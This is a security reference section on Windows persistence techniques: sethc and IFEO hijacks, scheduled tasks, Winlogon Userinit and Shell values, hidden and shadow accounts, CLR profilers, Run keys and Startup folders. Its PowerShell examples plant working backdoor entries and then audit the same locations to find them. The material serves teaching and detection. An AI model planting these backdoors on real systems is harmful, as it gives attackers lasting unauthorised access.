6.1.2. Persistence
6.1.2.2. Backdoor
6.1.2.2.1. sethc
sethc.exe is the Sticky Keys handler that Windows launches when Shift is pressed five times. It is started by winlogon on the secure desktop, so it runs as SYSTEM before anyone has authenticated. When an attacker can write files on the machine but cannot execute programs, a backdoor can be left by replacing sethc.exe with another program (classically cmd.exe) and then pressing Shift five times on the password input screen.
6.1.2.2.2. Image Hijacking
On later versions of Windows the file sethc.exe is protected by the system (it is owned by TrustedInstaller and covered by Windows Resource Protection), so replacing it on disk requires other tricks. Image File Execution Options (IFEO) provides one: in the registry, under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options, add a subkey named sethc.exe, and inside it create a string value named Debugger whose data is the path of the malicious program. Windows then starts the "debugger" in place of sethc.exe whenever sethc.exe is launched, including the Shift-five-times trigger on the logon screen.
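The following PowerShell is an added example and not code from the original page. It plants the IFEO Debugger entry for sethc.exe described above and then audits both IFEO roots (native and WOW6432Node) for any image that carries a Debugger value, which is how a defender finds the same hijack. It assumes an elevated PowerShell session; the payload path is a placeholder.

```powershell
# Added example, not from the original page: set an IFEO "Debugger" entry for
# sethc.exe, then list every image that has such an entry so the hijack can be
# found again. Assumes an elevated PowerShell; the payload path is a placeholder.

$payload = 'C:\Windows\System32\cmd.exe'   # placeholder payload (the classic demo uses cmd.exe)
$ifeoRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
)

# 1. Plant the hijack: a subkey named after the image, with a REG_SZ "Debugger" value.
$key = Join-Path $ifeoRoots[0] 'sethc.exe'
New-Item -Path $key -Force | Out-Null
New-ItemProperty -Path $key -Name 'Debugger' -Value $payload -PropertyType String -Force | Out-Null

# 2. Audit: walk both IFEO roots and report every subkey carrying a Debugger value.
#    Legitimate entries are rare (a real JIT debugger), so each hit deserves a look.
function Get-IfeoDebugger {
    foreach ($root in $ifeoRoots) {
        if (-not (Test-Path $root)) { continue }
        Get-ChildItem -Path $root | ForEach-Object {
            $dbg = (Get-ItemProperty -Path $_.PSPath -Name 'Debugger' -ErrorAction SilentlyContinue).Debugger
            if ($dbg) { [pscustomobject]@{ Image = $_.PSChildName; Debugger = $dbg; Root = $root } }
        }
    }
}
Get-IfeoDebugger | Format-Table -AutoSize

# Cleanup on a lab machine:
# Remove-Item -Path $key -Recurse -Force
```

The audit half is the part worth keeping: any Debugger value under IFEO that does not point at a known debugger is a persistence candidate, whatever the image name.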
6.1.2.2.3. Scheduled task
Windows has two scheduled-task mechanisms, schtasks and at; at has been deprecated in later versions of Windows. Creation commands:
schtasks /create /tn "TEST_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "TEST_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
Deletion command:
schtasks /delete /tn "TEST_OnLogon" /f
The first task runs at logon under the account that created it; the second runs at system start as SYSTEM and needs an elevated prompt to create.
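As an added example (not the page's own commands), the same logon task can be created with the ScheduledTasks module, and the registry of tasks can then be reviewed for every task that fires at boot or logon, together with the principal it runs as and the command it executes. It assumes Windows 8 / Server 2012 or newer, where the ScheduledTasks module exists.

```powershell
# Added example: create the page's logon-trigger task with the ScheduledTasks
# module instead of schtasks.exe, then list every task that runs at boot or
# logon with its principal and command line. Assumes Windows 8 / Server 2012+.

$action  = New-ScheduledTaskAction -Execute 'cmd.exe' -Argument '/c calc.exe'
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName 'TEST_OnLogon' -Action $action -Trigger $trigger -Force | Out-Null

# Audit: tasks triggered at boot or logon, who they run as, and what they run.
function Get-BootLogonTask {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        $bootOrLogon = $task.Triggers | Where-Object {
            $_.CimClass.CimClassName -in @('MSFT_TaskBootTrigger', 'MSFT_TaskLogonTrigger')
        }
        if ($bootOrLogon) {
            foreach ($a in $task.Actions) {
                [pscustomobject]@{
                    Task      = "$($task.TaskPath)$($task.TaskName)"
                    RunAs     = $task.Principal.UserId
                    Execute   = $a.Execute      # empty for COM-handler actions
                    Arguments = $a.Arguments
                }
            }
        }
    }
}
Get-BootLogonTask | Format-Table -AutoSize

# Cleanup:
# Unregister-ScheduledTask -TaskName 'TEST_OnLogon' -Confirm:$false
```

When reviewing the output, pay particular attention to tasks whose Execute path lies in a user-writable directory or whose RunAs is SYSTEM but whose task path is outside \Microsoft\.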
6.1.2.2.4. Login Script
Windows runs the programs listed in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit immediately after a user authenticates, before the shell starts; appending a program to that value makes it run at every logon.
The same effect can be achieved per user by setting the value UserInitMprLogonScript under HKCU\Environment, which userinit.exe executes at logon.
6.1.2.2.5. Screen saver
Windows lets each user customize the screen saver through the values under HKEY_CURRENT_USER\Control Panel\Desktop; pointing the screen saver at an arbitrary executable makes it run with that user's privileges once the idle timeout elapses.
6.1.2.2.6. Hide users
Windows allows creating a user whose name ends with $. Such an account is hidden in some views (for example, it is omitted from the output of net user), but it is still visible through the Control Panel and Computer Management.
Building on a hidden user, a shadow user can be created by modifying the registry (the account's entries under the SAM hive). A user created this way can only be seen in the registry.
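The following is an added example, not code from the page. It creates a $-suffixed local user, shows that net user omits it while Get-LocalUser still lists it, and then compares the account names recorded in the SAM hive with the local user list, which is the check that exposes registry-only (shadow) accounts. Reading HKLM:\SAM requires running as SYSTEM (for example via psexec -s powershell.exe); the user name and password are constructed lab values.

```powershell
# Added example (not from the page): create a "$"-suffixed user, show where it is
# and is not listed, and compare SAM account names with Get-LocalUser to spot
# shadow accounts. The SAM check assumes the shell runs as SYSTEM; the user name
# and password are made up for the lab.

$name = 'svc_backup$'
$pw   = ConvertTo-SecureString 'P@ssw0rd-lab' -AsPlainText -Force   # constructed lab password
New-LocalUser -Name $name -Password $pw -Description 'lab test' | Out-Null

# "net user" hides names ending in "$"; Get-LocalUser does not.
"net user lists it:      " + ((((net user) -join "`n") -match [regex]::Escape($name)))
"Get-LocalUser lists it: " + ([bool](Get-LocalUser -Name $name -ErrorAction SilentlyContinue))

# Names present in SAM but absent from Get-LocalUser are shadow accounts that
# only the registry knows about.
function Get-ShadowAccount {
    $samNames = 'HKLM:\SAM\SAM\Domains\Account\Users\Names'
    if (-not (Test-Path $samNames)) {
        return 'HKLM:\SAM not readable; rerun as SYSTEM to compare SAM with Get-LocalUser'
    }
    $inSam   = (Get-ChildItem -Path $samNames).PSChildName
    $visible = (Get-LocalUser).Name
    $inSam | Where-Object { $_ -notin $visible } | ForEach-Object { "SHADOW account in SAM only: $_" }
}
Get-ShadowAccount

# Cleanup:
# Remove-LocalUser -Name $name
```

The $ trick only fools tools that filter on the name; the SAM comparison catches both it and the registry-only shadow account, because the SAM Names keys are the ground truth for local accounts.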
6.1.2.2.7. CLR
The CLR (Common Language Runtime) is the runtime environment Microsoft built for .NET, roughly a .NET virtual machine. No .NET program can run without the CLR, so a backdoor can be implemented by hijacking the CLR: for example, a profiler DLL registered through the COR_ENABLE_PROFILING and COR_PROFILER environment variables is loaded into every .NET process that starts.
6.1.2.2.8. Winlogon Helper DLL backdoor
Winlogon is the Windows component that handles logon, logoff, loading the user profile during authentication, shutdown, locking the screen and similar activities. Its behaviour is governed by the registry, which defines which processes are started during Windows logon, so these registry values can be used to maintain access.
The registry locations are:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: used to run an EXE (the user shell, explorer.exe by default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: used to run an EXE (userinit.exe by default; a comma-separated list)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify: used to load a DLL (Winlogon notification packages; honoured on Windows XP/Server 2003 only and removed from Windows Vista onwards)
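As an added example serving both the Login Script section and this one (not the page's own code), the PowerShell below appends a program to Winlogon\Userinit, then checks the Userinit and Shell values against their stock defaults and reports the per-user UserInitMprLogonScript hook. It assumes an elevated shell and a standard installation (defaults are C:\Windows\system32\userinit.exe, and explorer.exe); the payload path is hypothetical. A malformed Userinit value breaks interactive logon for every user, so try this in a VM.

```powershell
# Added example: append a program to Winlogon\Userinit and then audit the
# Winlogon values against their defaults. Assumes an elevated shell on a
# standard install; the payload path is hypothetical. Test in a VM: a bad
# Userinit value prevents all interactive logons.

$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$payload  = 'C:\Tools\backdoor.exe'   # hypothetical

# Userinit is a comma-separated list; keep the original entry so logon still works.
$current = (Get-ItemProperty -Path $winlogon -Name Userinit).Userinit
if ($current -notlike "*$payload*") {
    Set-ItemProperty -Path $winlogon -Name Userinit -Value ($current.TrimEnd(',') + ',' + $payload + ',')
}

# Audit: compare against the stock values (string compare is case-insensitive).
# Anything beyond the default is a persistence candidate.
$expected = @{
    Userinit = 'C:\Windows\system32\userinit.exe,'
    Shell    = 'explorer.exe'
}
function Get-WinlogonStatus {
    foreach ($name in $expected.Keys) {
        $value  = (Get-ItemProperty -Path $winlogon -Name $name -ErrorAction SilentlyContinue).$name
        $status = if ($value -eq $expected[$name]) { 'default' } else { 'MODIFIED' }
        [pscustomobject]@{ Value = $name; Status = $status; Data = $value }
    }
    # Per-user logon script hook from the Login Script section.
    $mpr = (Get-ItemProperty -Path 'HKCU:\Environment' -Name UserInitMprLogonScript -ErrorAction SilentlyContinue).UserInitMprLogonScript
    if ($mpr) { [pscustomobject]@{ Value = 'UserInitMprLogonScript'; Status = 'SET'; Data = $mpr } }
}
Get-WinlogonStatus | Format-Table -AutoSize

# Restore on the lab machine:
# Set-ItemProperty -Path $winlogon -Name Userinit -Value $expected.Userinit
```

Because Userinit is read by winlogon as SYSTEM but the listed programs run in the logging-on user's session, the planted program inherits that user's token rather than SYSTEM; the Shell value behaves the same way.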
6.1.2.3. Self-start
6.1.2.3.1. Registry-based self-start
By writing the corresponding value into the registry, a program can be started automatically at boot or logon. The main keys are Run and RunOnce; the difference is that a RunOnce value fires only once and is deleted automatically after it has been executed.
The registry keys are:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
The policy-based self-starting registry settings are as follows:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
The registry locations that define the path of the Startup folder are (an attacker can redirect the folder by changing these values):
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The service autostart keys are as follows (Windows 9x/ME only; NT-based Windows does not process them):
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
User logon autostart locations: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell, where the Userinit value may list several programs separated by commas.
If the user has a screen saver enabled, the screen saver can also be used to launch the backdoor. The relevant registry values are:
HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveActive
HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaverIsSecure
HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut
HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE
6.1.2.3.2. Automatic startup based on a specific directory
Startup folders: C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup applies to that user only, and C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp applies to all users. Before NT6 (Windows Vista) the two directories were C:\Documents and Settings\Username\Start Menu\Programs\StartUp and C:\Documents and Settings\All Users\Start Menu\Programs\StartUp.
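The following added example (not code from the page) covers the registry-based and directory-based autostart locations from the two sections above: it writes one per-user Run value, enumerates every Run, RunOnce, RunOnceEx and Policies\Explorer\Run key listed (including the WOW6432Node Run key on 64-bit systems), and resolves the per-user and all-users Startup folders through the User Shell Folders values rather than assuming their default paths, since those values can be redirected. The payload path is hypothetical.

```powershell
# Added example: write a Run value, then enumerate the registry autostart keys
# and the Startup folders. Not the page's code; the payload path is hypothetical.

$payload = 'C:\Tools\backdoor.exe'   # hypothetical

# Writing a per-user Run value, the simplest registry autostart.
New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' `
    -Name 'Updater' -Value $payload -PropertyType String -Force | Out-Null

$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnceEx',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)

function Get-AutostartEntry {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        # RunOnceEx keeps its commands in numbered subkeys, so include subkeys too.
        $items = @(Get-Item -Path $key) + @(Get-ChildItem -Path $key -Recurse)
        foreach ($item in $items) {
            $props = Get-ItemProperty -Path $item.PSPath
            foreach ($p in $props.PSObject.Properties) {
                # Skip the PSPath/PSParentPath/... properties the provider adds.
                if ($p.Name -notmatch '^PS(Path|ParentPath|ChildName|Drive|Provider)$') {
                    [pscustomobject]@{ Location = $item.Name; Name = $p.Name; Command = $p.Value }
                }
            }
        }
    }

    # Startup folders: resolve them from User Shell Folders, which hold
    # environment-variable paths and can be pointed elsewhere by an attacker.
    $userUsf = Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders'
    $machUsf = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders'
    $dirs = @($userUsf.Startup, $machUsf.'Common Startup') |
        ForEach-Object { [Environment]::ExpandEnvironmentVariables($_) }
    foreach ($dir in $dirs) {
        if (Test-Path $dir) {
            Get-ChildItem -Path $dir -File | ForEach-Object {
                [pscustomobject]@{ Location = $dir; Name = $_.Name; Command = $_.FullName }
            }
        }
    }
}
Get-AutostartEntry | Format-Table -AutoSize

# Cleanup:
# Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Updater'
```

Resolving the Startup folder through User Shell Folders matters: if the Startup value has been changed, the default C:\Users\Username\...\Startup path will look clean while the redirected folder is what Explorer actually runs.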